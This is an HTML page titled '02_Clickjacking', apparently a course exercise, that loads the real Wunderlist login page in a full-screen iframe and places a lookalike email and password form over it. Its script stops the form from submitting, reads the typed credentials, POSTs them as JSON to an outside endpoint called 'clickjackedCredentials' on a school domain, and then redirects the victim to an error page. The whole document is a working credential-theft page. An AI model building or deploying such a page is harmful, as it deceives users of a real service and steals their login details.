<!doctype html>
<html class="no-js" lang="">
    <head>
		<meta charset="utf-8">
		<title>02_Clickjacking</title>
		<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">
	</head>
	<style>
		body {
			margin: 0;
			font-family: "Lato","Open Sans",
				"Microsoft Yahei","微软雅黑",
				STXihei,"华文细黑",
				"Hiragino Kaku Gothic Pro",
				Osaka,'ＭＳ Ｐゴシック',
				'MS PGothic','メイリオ',
				Meiryo,
				"Geneva CY",
				"Lucida Grande",
				"Arial Unicode MS",
				"Helvetica Neue",
				"Arial",
				Sans-Serif;
			font-size: 15px;
		}

		.frame {
			position: absolute;
			top: 0;
			left: 0;
			width: 100%;
			height: 100%;
			opacity: 1;
			z-index: -99;
		}

		.content-wrapper{
			position: absolute;
			top: 0;
			left: 0;
			height: 100vh;
			width: 100vw;
			justify-content: center;
			align-items: center;
		}

		.announcement {
			min-height: 53px;
		}

		.logo {
			margin: 40px auto 0 auto;
			display: block;
			height: 80px;
		}
		
		/* -------------- START: in case of screen width changes -------------- */
		/* not the nicest solution, but this way the announcement banner can be simulated. 
		because i cant use the exact font the original website is using and it wouldnt change the height at the same position, 
		this was the best solution i could think of. */

		@media screen and (max-width: 825px){
			.announcement {
				min-height: 55px;
			}
		}

		@media screen and (max-width: 790px){
			.announcement {
				min-height: 57px;
			}
		}

		@media screen and (max-width: 430px){
			.announcement {
				min-height: 74px;
			}
		}

		@media screen and (max-width: 505px){
			.logo {
				margin-top: 20px;
			}
		}
		/* -------------- END: in case of screen width changes -------------- */
		
		.login {
			max-width: 370px;
			min-width: 320px;
			margin: 30px auto 20px auto;
			padding: 0 10px;
		}

		.auth-form {
			height: 230px;
		}

		.row {
			padding: 15px;
			height: 60px;
			display: flex;
		}

		.space{
			width: 24px;
			margin: 0 11px 0 18px;
		}

		.input {
			border: 0 none; 
			padding: 5px 0;
			box-sizing: border-box;
			line-height: 15px;
			color: #666;
			outline: none;
		}

		.submit {
			padding: 0 15px;
		}

		.button {
			display: block;
			width: 100%;
			font-size: 15px;
			padding: 10px 10px;
			border-radius: 3px;
			margin: 18px 15px;
			font-weight: bold;
			border: 0 none;
			background-color: #2b88d9;
			color: #fff;
			cursor: pointer;
			transition: 0.1s transform ease-in-out;
			-webkit-appearance: none;
		}
	</style>
    <body>		
		<!-- External Website -->
		<iframe src="https://www.wunderlist.com/login" class="frame" id="frame"></iframe>

		<!-- Overlapping content for clickjacking -->
		<div class="content-wrapper">
			<div class="announcement"></div>
			<div class="logo"></div>

			<div class="login">
				<form method="POST" class="auth-form" accept-charset="utf-8" action="" id="loginForm">
					<div class="row">
						<span class="space"></span>

						<!-- Checks if the input corresponds to the email pattern (email instead of username) -->
						<!-- Implemented to make it more like the actual site -->
						<input type="email" id="email" placeholder="Email" pattern="^[^\s@＠=]+[@|＠][^\.\s@＠]+(\.[^\.\s@＠]+)+$" 
							title="Please enter a valid email address." class="input">
					</div>

					<div class="row">
						<span class="space"></span>
						<input type="password" id="password" placeholder="Password" class="input">
					</div>

					<div class="row submit">
						<input type="submit" class="button" value="Sign In">
					</div>
				</form>
			</div>
		</div>

		<script>			
			// Somehow it autofocuses the email field inside the iframe
			// Removes focus from the email field inside the iframe and instead focuses the email field on the created email input 
			window.onload = function() {
				document.getElementById("email").focus();
			};

			// Listens "on submit"
			document.getElementById("loginForm").addEventListener('submit', function(e){
				e.preventDefault();																		// Prevents submit button from submitting the form 
				e.stopPropagation(); 																	// Stops the event from bubbling up the event chain
				
				var email = document.getElementById("email").value;										// Get email and password value
				var password = document.getElementById("password").value;

				if(e.target && e.target.id == 'loginForm'){												// Prevent the submission of other forms							
					fetch('https://m183.gibz-informatik.ch/api/clickjackedCredentials', {
						method: 'POST',
						mode: 'cors', 																	// Unsupported Media Type Error with 'no-cors' - ???
						headers: {
							'Content-Type': 'application/json',
						},
						body: JSON.stringify({
							source: 'https://www.wunderlist.com/login',
							username: email,															// Little Mistake: Got Emails instead of usernames | Usecase is still the same though
							password: password
						})
					})
					.then(r => {
						window.location.replace("./error.html")											// Redirect to error page - needs to be done in a 'then' otherwise the post request doesnt get executed right
					});
				}
			});
		</script>
	</body>
</html>